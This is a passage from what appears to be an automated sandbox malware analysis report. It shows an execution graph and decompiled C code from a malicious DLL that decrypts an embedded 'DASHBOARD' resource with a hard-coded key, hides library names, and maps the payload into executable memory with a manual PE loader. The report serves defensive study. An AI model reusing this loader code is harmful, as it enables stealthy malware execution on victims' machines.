                                                                                                                                    • Opcode Fuzzy Hash: 0ab8388bb993b8766c573e1941374b7d73584e8dfee874aca440d1715006f1a5
                                                                                                                                    • Instruction Fuzzy Hash: 2F311F6190E7C24FE747577858AA6A07FB0AF13210F0E04EBC488CF0A3E45C898AC762
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:16.1%
                                                                                                                                    Dynamic/Decrypted Code Coverage:16.2%
                                                                                                                                    Signature Coverage:21.9%
                                                                                                                                    Total number of Nodes:297
                                                                                                                                    Total number of Limit Nodes:23
                                                                                                                                    execution_graph 31846 10035042 TlsGetValue 31847 10035076 GetModuleHandleA 31846->31847 31848 10035055 31846->31848 31850 10035085 GetProcAddress 31847->31850 31851 1003509f 31847->31851 31848->31847 31849 1003505f TlsGetValue 31848->31849 31854 1003506a 31849->31854 31852 1003506e 31850->31852 31852->31851 31853 10035095 RtlEncodePointer 31852->31853 31853->31851 31854->31847 31854->31852 31855 10020c26 31858 10020c32 __EH_prolog3 31855->31858 31857 10020c80 31882 100206c8 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 31857->31882 31858->31857 31866 1002083b EnterCriticalSection 31858->31866 31880 100201f1 RaiseException __CxxThrowException@8 31858->31880 31881 1002094b TlsAlloc InitializeCriticalSection 31858->31881 31862 10020c8d 31863 10020c93 31862->31863 31864 10020ca6 ~_Task_impl 31862->31864 31883 100209ed 88 API calls 4 library calls 31863->31883 31871 1002085a 31866->31871 31867 10020916 _memset 31868 1002092a LeaveCriticalSection 31867->31868 31868->31858 31869 10020893 31884 10014460 31869->31884 31870 100208a8 GlobalHandle GlobalUnlock 31873 10014460 ctype 80 API calls 31870->31873 31871->31867 31871->31869 31871->31870 31875 100208c5 GlobalReAlloc 31873->31875 31876 100208cf 31875->31876 31877 100208f7 GlobalLock 31876->31877 31878 100208da GlobalHandle GlobalLock 31876->31878 31879 100208e8 LeaveCriticalSection 31876->31879 31877->31867 31878->31879 31879->31877 31881->31858 31882->31862 31883->31864 31885 10014477 ctype 31884->31885 31886 1001448c GlobalAlloc 31885->31886 31888 10013ba0 80 API calls ctype 31885->31888 31886->31876 31888->31886 31889 10030d06 31890 10030d12 31889->31890 31891 10030d0d 31889->31891 31895 10030c10 31890->31895 31907 1003906d GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 31891->31907 31894 10030d23 31898 10030c1c _raise 31895->31898 31896 10030c69 31905 10030cb9 _raise 31896->31905 31962 100125c0 31896->31962 31898->31896 31898->31905 31908 10030a37 31898->31908 31901 10030c99 31903 10030a37 __CRT_INIT@12 165 API calls 31901->31903 31901->31905 31902 100125c0 ___DllMainCRTStartup 146 API calls 31904 10030c90 31902->31904 31903->31905 31906 10030a37 __CRT_INIT@12 165 API calls 31904->31906 31905->31894 31906->31901 31907->31890 31909 10030b61 31908->31909 31910 10030a4a GetProcessHeap HeapAlloc 31908->31910 31912 10030b67 31909->31912 31913 10030b9c 31909->31913 31911 10030a6e GetVersionExA 31910->31911 31926 10030a67 31910->31926 31914 10030a89 GetProcessHeap HeapFree 31911->31914 31915 10030a7e GetProcessHeap HeapFree 31911->31915 31920 10030b86 31912->31920 31912->31926 32010 100310be 67 API calls _doexit 31912->32010 31916 10030ba1 31913->31916 31917 10030bfa 31913->31917 31918 10030ab5 31914->31918 31915->31926 31994 10035135 6 API calls __decode_pointer 31916->31994 31917->31926 32029 10035425 79 API calls 2 library calls 31917->32029 31984 10036624 HeapCreate 31918->31984 31920->31926 32011 100389ee 68 API calls __freea 31920->32011 31921 10030ba6 31995 10035840 31921->31995 31926->31896 31927 10030aeb 31927->31926 31930 10030af4 31927->31930 32001 1003548e 78 API calls 6 library calls 31930->32001 31931 10030b90 32012 10035178 70 API calls 2 library calls 31931->32012 31932 10030bbe 32014 100350ae TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress 31932->32014 31936 10030af9 __RTC_Initialize 31940 10030b0c GetCommandLineA 31936->31940 31954 10030afd 31936->31954 31937 10030b95 32013 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31937->32013 32003 10038d66 77 API calls 3 library calls 31940->32003 31941 10030bd0 31943 10030bd7 31941->31943 31944 10030bee 31941->31944 32015 100351b5 67 API calls 4 library calls 31943->32015 32016 1002fa69 31944->32016 31946 10030b1c 32004 100387ae 72 API calls 3 library calls 31946->32004 31949 10030bde GetCurrentThreadId 31949->31926 31950 10030b26 31951 10030b2a 31950->31951 32006 10038cad 111 API calls 3 library calls 31950->32006 32005 10035178 70 API calls 2 library calls 31951->32005 32002 1003667e VirtualFree HeapFree HeapFree HeapDestroy 31954->32002 31955 10030b36 31956 10030b4a 31955->31956 32007 10038a3a 110 API calls 6 library calls 31955->32007 31961 10030b02 31956->31961 32009 100389ee 68 API calls __freea 31956->32009 31959 10030b3f 31959->31956 32008 10030f4d 75 API calls 4 library calls 31959->32008 31961->31926 32055 10006a90 31962->32055 31965 1001265a 32089 1002fe65 105 API calls 7 library calls 31965->32089 31966 1001261c FindResourceW LoadResource SizeofResource 31969 10006a90 ___DllMainCRTStartup 67 API calls 31966->31969 31972 10012744 ___DllMainCRTStartup 31969->31972 31971 1001284d 31971->31901 31971->31902 31973 100127b7 VirtualAlloc 31972->31973 31974 1001279b VirtualAllocExNuma 31972->31974 31975 100127da 31973->31975 31974->31975 32060 1002fb00 31975->32060 31979 100127fa 32083 10002970 31979->32083 31981 10012810 ___DllMainCRTStartup 32086 100026a0 31981->32086 31983 10012664 32090 1002f81e 5 API calls __invoke_watson 31983->32090 31985 10036647 31984->31985 31986 10036644 31984->31986 32030 100365c9 67 API calls 3 library calls 31985->32030 31986->31927 31988 1003664c 31989 10036656 31988->31989 31990 1003667a 31988->31990 32031 10035aca HeapAlloc 31989->32031 31990->31927 31992 10036660 31992->31990 31993 10036665 HeapDestroy 31992->31993 31993->31986 31994->31921 31996 10035844 31995->31996 31998 10030bb2 31996->31998 31999 10035864 Sleep 31996->31999 32032 10030678 31996->32032 31998->31926 31998->31932 32000 10035879 31999->32000 32000->31996 32000->31998 32001->31936 32002->31961 32003->31946 32004->31950 32005->31954 32006->31955 32007->31959 32008->31956 32009->31951 32010->31920 32011->31931 32012->31937 32013->31926 32014->31941 32015->31949 32017 1002fa75 _raise 32016->32017 32018 1002fab4 32017->32018 32019 1002faee _raise _realloc 32017->32019 32051 10035a99 67 API calls 2 library calls 32017->32051 32018->32019 32020 1002fac9 HeapFree 32018->32020 32019->31961 32020->32019 32022 1002fadb 32020->32022 32054 100311f4 67 API calls __getptd_noexit 32022->32054 32024 1002fae0 GetLastError 32024->32019 32025 1002faa6 32053 1002fabf LeaveCriticalSection _doexit 32025->32053 32026 1002fa8c ___sbh_find_block 32026->32025 32052 10035b3d VirtualFree VirtualFree HeapFree __cftoe2_l 32026->32052 32029->31926 32030->31988 32031->31992 32033 10030684 _raise 32032->32033 32034 1003069c 32033->32034 32044 100306bb _memset 32033->32044 32045 100311f4 67 API calls __getptd_noexit 32034->32045 32036 100306a1 32046 10037753 4 API calls 2 library calls 32036->32046 32037 100306b1 _raise 32037->31996 32039 1003072d RtlAllocateHeap 32039->32044 32044->32037 32044->32039 32047 10035a99 67 API calls 2 library calls 32044->32047 32048 100362e6 5 API calls 2 library calls 32044->32048 32049 10030774 LeaveCriticalSection _doexit 32044->32049 32050 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32044->32050 32045->32036 32047->32044 32048->32044 32049->32044 32050->32044 32051->32026 32052->32025 32053->32018 32054->32024 32056 1002f9a6 _malloc 67 API calls 32055->32056 32058 10006aa1 32056->32058 32057 10006aad 32057->31965 32057->31966 32058->32057 32059 1002fa69 __freea 67 API calls 32058->32059 32059->32057 32061 1002fb18 32060->32061 32062 1002fb3f __VEC_memcpy 32061->32062 32063 100127eb 32061->32063 32062->32063 32064 1002f9a6 32063->32064 32065 1002fa53 32064->32065 32076 1002f9b4 32064->32076 32098 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32065->32098 32067 1002fa59 32099 100311f4 67 API calls __getptd_noexit 32067->32099 32070 1002fa5f 32070->31979 32073 1002fa17 RtlAllocateHeap 32073->32076 32074 1002f9c9 32074->32076 32091 10036892 67 API calls __NMSG_WRITE 32074->32091 32092 100366f2 67 API calls 7 library calls 32074->32092 32093 10030e7b GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 32074->32093 32076->32073 32076->32074 32077 1002fa4a 32076->32077 32078 1002fa3e 32076->32078 32081 1002fa3c 32076->32081 32094 1002f957 67 API calls 4 library calls 32076->32094 32095 100368d5 TlsGetValue TlsGetValue GetModuleHandleA GetProcAddress __decode_pointer 32076->32095 32077->31979 32096 100311f4 67 API calls __getptd_noexit 32078->32096 32097 100311f4 67 API calls __getptd_noexit 32081->32097 32084 1002f9a6 _malloc 67 API calls 32083->32084 32085 10002990 32084->32085 32085->31981 32100 10002280 32086->32100 32089->31983 32090->31971 32091->32074 32092->32074 32094->32076 32095->32076 32096->32081 32097->32077 32098->32067 32099->32070 32137 10001990 32100->32137 32103 100022c3 SetLastError 32134 100022a9 32103->32134 32104 100022d5 32105 10001990 ___DllMainCRTStartup SetLastError 32104->32105 32106 100022ee 32105->32106 32107 10002310 SetLastError 32106->32107 32108 10002322 32106->32108 32106->32134 32107->32134 32109 10002331 SetLastError 32108->32109 32110 10002343 32108->32110 32109->32134 32111 1000234e SetLastError 32110->32111 32113 10002360 GetNativeSystemInfo 32110->32113 32111->32134 32114 10002414 SetLastError 32113->32114 32115 10002426 VirtualAlloc 32113->32115 32114->32134 32116 10002472 GetProcessHeap HeapAlloc 32115->32116 32117 10002447 VirtualAlloc 32115->32117 32119 100024ac 32116->32119 32120 1000248c VirtualFree SetLastError 32116->32120 32117->32116 32118 10002463 SetLastError 32117->32118 32118->32134 32121 10001990 ___DllMainCRTStartup SetLastError 32119->32121 32120->32134 32122 1000250e 32121->32122 32123 10002512 32122->32123 32124 1000251c VirtualAlloc 32122->32124 32175 10002840 VirtualFree VirtualFree GetProcessHeap HeapFree ___DllMainCRTStartup 32123->32175 32125 1000254b ___DllMainCRTStartup 32124->32125 32140 100019c0 32125->32140 32128 1000257f ___DllMainCRTStartup 32128->32123 32150 10001ff0 32128->32150 32132 100025e8 ___DllMainCRTStartup 32132->32123 32132->32134 32169 2ce991 32132->32169 32134->31983 32135 1000264f SetLastError 32135->32123 32138 100019ab 32137->32138 32139 1000199f SetLastError 32137->32139 32138->32103 32138->32104 32138->32134 32139->32138 32141 100019f0 32140->32141 32142 10001a83 32141->32142 32144 10001a2c VirtualAlloc 32141->32144 32149 10001aa0 ___DllMainCRTStartup 32141->32149 32143 10001990 ___DllMainCRTStartup SetLastError 32142->32143 32145 10001a9c 32143->32145 32146 10001a50 32144->32146 32147 10001a57 ___DllMainCRTStartup 32144->32147 32148 10001aa4 VirtualAlloc 32145->32148 32145->32149 32146->32149 32147->32141 32148->32149 32149->32128 32151 10002029 IsBadReadPtr 32150->32151 32160 1000201f 32150->32160 32153 10002053 32151->32153 32151->32160 32154 10002085 SetLastError 32153->32154 32155 10002099 32153->32155 32153->32160 32154->32160 32176 100018b0 VirtualQuery VirtualFree VirtualAlloc ___DllMainCRTStartup 32155->32176 32157 100020b3 32158 100020bf SetLastError 32157->32158 32162 100020e9 32157->32162 32158->32160 32160->32123 32163 10001cb0 32160->32163 32161 100021f9 SetLastError 32161->32160 32162->32160 32162->32161 32164 10001cf8 ___DllMainCRTStartup 32163->32164 32165 10001e01 32164->32165 32167 10001ddd 32164->32167 32177 10001b80 32164->32177 32166 10001b80 ___DllMainCRTStartup 2 API calls 32165->32166 32166->32167 32167->32132 32170 2cea8d 32169->32170 32171 2cea62 32169->32171 32170->32134 32170->32135 32184 2cf8fd 32171->32184 32175->32134 32176->32157 32178 10001b9c 32177->32178 32179 10001b92 32177->32179 32181 10001c04 VirtualProtect 32178->32181 32182 10001baa 32178->32182 32179->32164 32181->32179 32182->32179 32183 10001be2 VirtualFree 32182->32183 32183->32179 32195 2cfde0 32184->32195 32185 2cffd1 32208 2cab87 32185->32208 32188 2cea75 32188->32170 32197 2c93ed 32188->32197 32193 2ddcf7 GetPEB 32193->32195 32194 2ca8b0 GetPEB 32194->32195 32195->32185 32195->32188 32195->32193 32195->32194 32200 2cb23c 32195->32200 32204 2d46bb 32195->32204 32218 2dda22 GetPEB 32195->32218 32219 2c47ce GetPEB 32195->32219 32220 2cf899 GetPEB 32195->32220 32221 2c4b61 32195->32221 32198 2daa30 GetPEB 32197->32198 32199 2c9456 ExitProcess 32198->32199 32199->32170 32201 2cb254 32200->32201 32225 2daa30 32201->32225 32205 2d46da 32204->32205 32206 2daa30 GetPEB 32205->32206 32207 2d4729 SHGetFolderPathW 32206->32207 32207->32195 32209 2cabb0 32208->32209 32210 2c4b61 GetPEB 32209->32210 32211 2cad67 32210->32211 32233 2c7f5d 32211->32233 32213 2cad99 32214 2cada4 32213->32214 32237 2d1e67 GetPEB 32213->32237 32214->32188 32216 2cadc4 32238 2d1e67 GetPEB 32216->32238 32218->32195 32219->32195 32220->32195 32222 2c4b74 32221->32222 32239 2c1ea7 32222->32239 32226 2dab1d 32225->32226 32227 2cb2b8 lstrcmpiW 32225->32227 32231 2d0a0e GetPEB 32226->32231 32227->32195 32229 2dab33 32232 2ccdcd GetPEB 32229->32232 32231->32229 32232->32227 32234 2c7f8e 32233->32234 32235 2daa30 GetPEB 32234->32235 32236 2c7fd4 CreateProcessW 32235->32236 32236->32213 32237->32216 32238->32214 32240 2c1ebc 32239->32240 32243 2c702c 32240->32243 32244 2c7049 32243->32244 32245 2daa30 GetPEB 32244->32245 32246 2c1f4c 32245->32246 32246->32195

                                                                                                                                    Executed Functions

                                                                                                                                    Function 100125C0 Relevance: 45.7, APIs: 7, Strings: 19, Instructions: 165memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E100125C0(void* __ebx, void* __edi, void* __esi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				char _v40;
				void* _v44;
				void* _v48;
				long _v52;
				void* _v56;
				struct HRSRC__* _v60;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				short _v76;
				short _v78;
				short _v80;
				short _v82;
				short _v84;
				short _v86;
				char _v88;
				intOrPtr _v92;
				void* __ebp;
				signed int _t66;
				void* _t70;
				void* _t72;
				struct HRSRC__* _t74;
				void* _t78;
				intOrPtr _t92;
				void* _t93;
				void* _t95;
				intOrPtr _t104;
				signed int _t120;
				void* _t121;

				_t119 = __esi;
				_t118 = __edi;
				_t96 = __ebx;
				_t66 =  *0x100545cc; // 0x67083a02
				_v20 = _t66 ^ _t120;
				_v92 = _a8;
				 *0x10055a80 = _a4;
				_t109 = _a8;
				 *0x10055a84 = _a8;
				 *0x10055a88 = _a12;
				_v8 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v12 = 0;
				_t70 = E10006A90(__eflags); // executed
				_t131 = _t70;
				if(_t70 != 0) {
					_push(0x10046758);
					E1002FE65(__ebx, _t109, __edi, __esi, __eflags);
					_t72 = 0;
				} else {
					 *0x100530b8 = 0;
					 *0x100530bc = 0;
					 *0x100530c0 = 0;
					 *0x100530c8 = 0;
					 *0x100530c4 = 0;
					 *0x100530cc = 0;
					_v60 = 0;
					_v56 = 0;
					_t74 = FindResourceW(_a4, 0x1705, L"DASHBOARD"); // executed
					_v60 = _t74;
					_v56 = LoadResource(_a4, _v60);
					_v52 = SizeofResource(_a4, _v60);
					_v88 = 0x6b;
					_v86 = 0x65;
					_v84 = 0x72;
					_v82 = 0x6e;
					_v80 = 0x65;
					_v78 = 0x6c;
					_v76 = 0x33;
					_v74 = 0x32;
					_v72 = 0x2e;
					_v70 = 0x64;
					_v68 = 0x6c;
					_v66 = 0x6c;
					_v64 = 0;
					_v40 = 0x6e;
					_v38 = 0x74;
					_v36 = 0x64;
					_v34 = 0x6c;
					_v32 = 0x6c;
					_v30 = 0x2e;
					_v28 = 0x64;
					_v26 = 0x6c;
					_v24 = 0x6c;
					_v22 = 0;
					_t78 = E10006A90(_t131); // executed
					if(_t78 == 0) {
						_t45 =  &_v88; // 0x6b
						_t95 = E100048E0(_t45);
						_t121 = _t121 + 4;
						_v44 = _t95;
					}
					_t47 =  &_v40; // 0x6e
					_v48 = E100048E0(_t47);
					 *0x10055a7c = E100053D0(_v44, 0x6c705b40);
					 *0x10055a78 = E100053D0(_v44, 0x531ff383);
					_t133 =  *0x10055a78;
					if( *0x10055a78 == 0) {
						__eflags = 0x2000;
						_v12 = VirtualAlloc(0, _v52, 0x00002000 -  *0x100530cc | 0x00001000, 0x40);
					} else {
						_t93 =  *0x10055a78(0xffffffff, 0, _v52, 0x3000, 0x40, 0); // executed
						_v12 = _t93;
					}
					E1002FB00(_t96, _t118, _t119, _v12, _v56, _v52);
					_t104 =  *0x100530b4; // 0x2795
					_v16 = E1002F9A6(_t96, _v56, _t118, _t119, _t104);
					E10002970(_t133, _v16, "6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0", 0x24);
					_t109 = _v16;
					E10003EE0(_v16, _v12, _v52);
					_t92 = E100026A0(0x10055a64, _v12, _v52); // executed
					 *0x10055a8c = _t92;
					_t72 = 1;
				}
				return E1002F81E(_t72, _t96, _v20 ^ _t120, _t109, _t118, _t119);
			}
















































                                                                                                                                    0x100125c0
                                                                                                                                    0x100125c0
                                                                                                                                    0x100125c0
                                                                                                                                    0x100125c6
                                                                                                                                    0x100125cd
                                                                                                                                    0x100125d3
                                                                                                                                    0x100125d9
                                                                                                                                    0x100125df
                                                                                                                                    0x100125e2
                                                                                                                                    0x100125eb
                                                                                                                                    0x100125f0
                                                                                                                                    0x100125f7
                                                                                                                                    0x100125fe
                                                                                                                                    0x10012605
                                                                                                                                    0x1001260c
                                                                                                                                    0x10012613
                                                                                                                                    0x10012618
                                                                                                                                    0x1001261a
                                                                                                                                    0x1001265a
                                                                                                                                    0x1001265f
                                                                                                                                    0x10012667
                                                                                                                                    0x1001261c
                                                                                                                                    0x1001261c
                                                                                                                                    0x10012626
                                                                                                                                    0x10012630
                                                                                                                                    0x1001263a
                                                                                                                                    0x10012644
                                                                                                                                    0x1001264e
                                                                                                                                    0x1001266e
                                                                                                                                    0x10012675
                                                                                                                                    0x1001268a
                                                                                                                                    0x10012690
                                                                                                                                    0x100126a1
                                                                                                                                    0x100126b2
                                                                                                                                    0x100126b5
                                                                                                                                    0x100126bb
                                                                                                                                    0x100126c1
                                                                                                                                    0x100126c7
                                                                                                                                    0x100126cd
                                                                                                                                    0x100126d3
                                                                                                                                    0x100126d9
                                                                                                                                    0x100126df
                                                                                                                                    0x100126e5
                                                                                                                                    0x100126eb
                                                                                                                                    0x100126f1
                                                                                                                                    0x100126f7
                                                                                                                                    0x100126fd
                                                                                                                                    0x10012703
                                                                                                                                    0x10012709
                                                                                                                                    0x1001270f
                                                                                                                                    0x10012715
                                                                                                                                    0x1001271b
                                                                                                                                    0x10012721
                                                                                                                                    0x10012727
                                                                                                                                    0x1001272d
                                                                                                                                    0x10012733
                                                                                                                                    0x10012739
                                                                                                                                    0x1001273f
                                                                                                                                    0x10012746
                                                                                                                                    0x10012748
                                                                                                                                    0x1001274c
                                                                                                                                    0x10012751
                                                                                                                                    0x10012754
                                                                                                                                    0x10012754
                                                                                                                                    0x10012757
                                                                                                                                    0x10012763
                                                                                                                                    0x10012777
                                                                                                                                    0x1001278d
                                                                                                                                    0x10012792
                                                                                                                                    0x10012799
                                                                                                                                    0x100127c4
                                                                                                                                    0x100127d7
                                                                                                                                    0x1001279b
                                                                                                                                    0x100127ac
                                                                                                                                    0x100127b2
                                                                                                                                    0x100127b2
                                                                                                                                    0x100127e6
                                                                                                                                    0x100127ee
                                                                                                                                    0x100127fd
                                                                                                                                    0x1001280b
                                                                                                                                    0x1001281b
                                                                                                                                    0x1001281f
                                                                                                                                    0x10012834
                                                                                                                                    0x10012839
                                                                                                                                    0x1001283e
                                                                                                                                    0x1001283e
                                                                                                                                    0x10012850

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10006A90: _malloc.LIBCMT ref: 10006A9C
                                                                                                                                    • _printf.LIBCMT ref: 1001265F
                                                                                                                                    • FindResourceW.KERNEL32(00000000,00001705,DASHBOARD), ref: 1001268A
                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 1001269B
                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 100126AC
                                                                                                                                    • VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,00003000,00000040,00000000), ref: 100127AC
                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,-100510CC,00000040), ref: 100127D1
                                                                                                                                    • _malloc.LIBCMT ref: 100127F5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$AllocVirtual_malloc$FindLoadNumaSizeof_printf
                                                                                                                                    • String ID: .$.$2$3$6p2Z6a6CZ&M>ZR$a@Y$xnQ?<XBeh<22mz&0$DASHBOARD$d$d$e$kre3.l$l$l$l$l$l$l$l$n$ndldl
                                                                                                                                    • API String ID: 572389289-2839844625
                                                                                                                                    • Opcode ID: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                    • Instruction ID: 8f66a7c676ce8d0fa2ca8bd8519024a549b55f77dd79b918ae70bd0eec3b217e
                                                                                                                                    • Opcode Fuzzy Hash: adac8d752e0c47dc141f46a7132d7a35c557a18b7d00a43f57a8df52d4076e8d
                                                                                                                                    • Instruction Fuzzy Hash: FB613EB5D10218EBEB00DFA0DC95B9EBBB5FF08344F10911CE504AB390E7B66548CB6A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10002280 Relevance: 22.8, APIs: 15, Instructions: 331COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 2ce991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E10002280(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001990(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0xfffefe57
						if(E10001990(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0xfffefe57
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_t59 = _v64 - 1; // 0x71
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _t59 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001990(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001810(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0xfffefe57
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E100019C0(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10001EB0(_v100, _v72, _v76);
															}
															if(E10001FF0(_v100, _v72) != 0) {
																_t202 = E10001CB0(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10001E30(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
